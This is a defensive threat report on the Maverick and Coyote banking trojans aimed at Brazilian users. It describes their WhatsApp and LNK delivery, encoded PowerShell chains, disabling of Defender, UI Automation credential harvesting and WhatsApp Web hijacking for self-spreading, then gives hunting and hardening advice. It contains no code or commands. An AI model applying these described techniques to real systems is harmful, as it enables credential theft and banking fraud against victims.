Maverick And Coyote: Twin Brazilian Banking Trojans Riding The WhatsApp Threat Wave

Brazilian banking customers are facing a new generation of focused financial malware. Two closely related families, known as Maverick and Coyote, blend social engineering, fileless infection chains, and abuse of legitimate tools to steal credentials from online banking and cryptocurrency users at scale. Both trojans are built in .NET, heavily obfuscated, and tuned specifically for the Brazilian financial ecosystem.

Coyote established itself first as a multi stage Windows banking trojan that abused legitimate installers and overlay techniques. Maverick appeared later as a mass distribution banker that spreads through WhatsApp, reusing several ideas and code patterns from Coyote while introducing a much more aggressive propagation model. Together, they show how Brazilian banking malware operators are industrializing their toolchains and rapidly iterating on proven tactics.

Background: A Focus On Brazilian Financial Users

Both Maverick and Coyote are narrowly focused on Brazil. Their code checks time zone, language, and region settings, and the malware simply aborts execution if the victim does not appear to be in Brazil. Target lists emphasize local banks, payment platforms, and cryptocurrency services, with hundreds of URLs and applications hard coded into configuration data. This regional focus allows the operators to fine tune phishing overlays, URL monitoring logic, and social engineering lures for a single language and banking culture.

Coyote: Multi Stage Banker That Abuses Legitimate Installers

Initial Access And Delivery

Coyote was first documented as a sophisticated multi stage banking trojan delivered through a legitimate Windows application installer framework. Early campaigns used the Squirrel installer to load a chain of components that eventually injected the Coyote payload into memory. Later activity has also used shortcut (LNK) files and PowerShell based loaders to reach the same final banker.

The infection flow typically involves a legitimate looking installation package or shortcut that launches a script. That script retrieves an obfuscated loader from a command and control server, performs environment checks, disables some security controls where possible, and then uses process injection to run the Coyote banker within benign processes. This approach helps the malware evade simple signature detection and static AV scanning.

Capabilities And Target Scope

Once active, Coyote monitors browser windows and selected applications to identify when the user interacts with targeted financial services. It can:

• Capture credentials through keylogging and form grabbing.
• Display phishing overlays that mimic Brazilian banking login pages.
• Take screenshots when sensitive windows are in focus.
• Collect system information and security product data to send back to its operators.

Reports indicate that Coyote has targeted dozens of Brazilian banks and a growing list of cryptocurrency exchanges, with configuration files tracking well over sixty to seventy financial applications and websites. Over time, this target list has expanded into the low thousands of individual URLs and services as operators refine their monetization strategy.

Recent Evolution: Abuse Of Windows UI Automation

A more recent variant made Coyote particularly noteworthy by abusing the Windows UI Automation (UIA) framework. Instead of relying only on process names or overlays, the malware uses accessibility features to inspect browser user interface elements, such as address bars and page contents, and then extract data from them.

This capability allows Coyote to recognize when users access targeted banks or cryptocurrency services in the browser and harvest credentials even when traditional overlay techniques are less effective. It also demonstrates a trend toward abusing legitimate accessibility frameworks as covert data collection channels.

Maverick: WhatsApp Driven Successor With Strong Coyote DNA

WhatsApp Distribution And LNK Based Infection Chain

Maverick appeared in 2025 as a new Windows banking trojan spreading through WhatsApp. Campaigns rely on ZIP archives containing a malicious LNK shortcut that are delivered through WhatsApp messages. The lure often instructs users to open the file on a Windows computer, bypassing mobile protections and placing the victim directly in a desktop context where the banker can operate.

When the victim opens the shortcut, it launches obfuscated cmd.exe and PowerShell commands. These commands reach out to attacker controlled infrastructure, download additional scripts, and construct the next stage payload entirely in memory. Researchers have documented complex chains of nested loops, Base64 strings, and encoded PowerShell payloads that assemble the final banker while avoiding cleartext malicious commands in the process history.

The second stage script typically disables Microsoft Defender and weakens User Account Control, then downloads a .NET loader which finally retrieves the Maverick banker itself. Persistence is achieved using batch files in the startup folder and other low profile mechanisms that blend into normal Windows behavior.

Hijacking WhatsApp Web And Banking Sessions

Maverick does more than silently steal credentials. It also abuses WhatsApp Web to propagate further. By using browser automation components such as ChromeDriver and the Chromium Embedded Framework, along with a WhatsApp automation library, the malware can hijack the victim's WhatsApp Web session and send malicious ZIP archives to all of their contacts.

To maximize its reach, Maverick:

• Terminates existing Chrome sessions and copies the victim's browser profile into a temporary workspace.
• Reuses cookies and authentication tokens so it can access WhatsApp Web without user interaction.
• Contacts the command and control server for message templates and propagation settings.
• Sends personalized messages with time based greetings and the malicious ZIP file to harvested contacts.

In parallel, Maverick monitors browser tabs for URLs associated with targeted Brazilian financial institutions. When it detects a match, it can capture credentials, manipulate sessions, and assist operators in performing fraudulent transactions. The combination of banking theft and worm like propagation makes Maverick a powerful tool in the hands of Brazilian cybercriminal groups.

Links Between Maverick And Coyote

Threat research teams have highlighted strong links between the two families. Similarities include:

• Both are written in .NET and use heavily obfuscated loaders.
• Both rely on shortcut files that spawn multi stage PowerShell infection chains.
• Both implement almost identical routines for monitoring banking URLs and applications.
• Both target primarily Brazilian users and banks, with overlapping victim profiles.
• Both use fileless techniques and reflective loading to reduce forensic artifacts on disk.

Despite these overlaps, Maverick is generally treated as a distinct banker that reuses ideas and components from Coyote rather than a simple variant. The shared DNA indicates that the same development ecosystem, and possibly the same group of operators, is behind both toolsets.

Tactics, Techniques And Procedures

From a defender perspective, Maverick and Coyote combine several TTPs that are increasingly common in financially motivated campaigns:

• Initial access through messaging apps: Use of WhatsApp to deliver ZIP archives with shortcut files that are less likely to be blocked than executable attachments.
• Living off the land scripting: Heavy use of cmd.exe and PowerShell with encoded commands instead of direct binaries.
• Legitimate tool abuse: Squirrel installers, ChromeDriver, UI Automation and other benign frameworks repurposed as part of the infection chain.
• Fileless stages and reflective loading: Critical payloads constructed directly in memory to avoid leaving obvious artifacts on disk.
• Region aware targeting: Execution is gated on system locale checks so that the malware runs only on Brazilian systems.
• Session hijacking and overlays: Use of UI inspection, overlays, and browser control to capture credentials and drive fraudulent transactions.

Detection And Hunting Guidance

Security teams, especially those in Brazilian banks and fintechs, should consider dedicated hunts for indicators aligned to Maverick and Coyote behavior. Useful approaches include:

• Monitor for WhatsApp related ZIP downloads: Look for ZIP archives arriving from web.whatsapp.com or WhatsApp desktop clients, especially those containing LNK files.
• Flag LNK to PowerShell chains: Alert when shortcut files launch cmd.exe or powershell.exe with long, encoded command lines and outbound HTTPS traffic shortly afterward.
• Detect abnormal use of ChromeDriver and browser automation: On endpoints, watch for ChromeDriver or similar automation tools spawned by PowerShell or scripts in unusual paths.
• Hunt for UI Automation abuse: On Windows workstations, investigate processes that use UI Automation APIs while also maintaining outbound connections to untrusted hosts.
• Correlate locale checks and early exits: Malware that terminates quickly after locale checks can appear as short lived processes; correlate such events with unusual script execution or suspicious archives.

Mitigation And Hardening For Financial Institutions

Defending against Maverick and Coyote requires a combination of endpoint controls, network monitoring, and user awareness. Key actions include:

• Strengthen endpoint controls: Enforce PowerShell Constrained Language Mode where possible, log script block activity, and block execution of LNK files from user profile download locations.
• Apply least privilege on desktops: Limit local administrator access so that malware cannot trivially disable security features or change system settings.
• Harden browser and authentication flows: Enforce multi factor authentication, device binding, and transaction signing for high value actions, reducing the impact of stolen credentials.
• Control messaging and collaboration channels: Implement content scanning, URL filtering, and attachment controls for WhatsApp Web, email, and other channels used by frontline staff who interact with customers.
• Run targeted awareness campaigns: Educate users and employees about malicious ZIP archives, shortcuts, and unsolicited financial documents arriving via messaging apps.
• Prepare response playbooks: Create specific incident response procedures for suspected banking malware, including rapid credential reset, validation of recent transactions, and workstation reimaging where necessary.

Conclusion

Maverick and Coyote illustrate how Brazilian banking malware has evolved from single purpose trojans into modular platforms that blend session hijacking, accessibility abuse, social engineering, and worm like propagation through WhatsApp. Their close relationship suggests an active development ecosystem that will continue to iterate on these techniques and expand target lists across Latin America and beyond.

Financial institutions should treat these campaigns as a strategic threat, not a one off wave of opportunistic attacks. By combining strong endpoint telemetry, browser hardening, secure authentication, and focused threat hunting, defenders can significantly reduce the window of opportunity for Maverick, Coyote, and whatever Brazilian banker emerges next.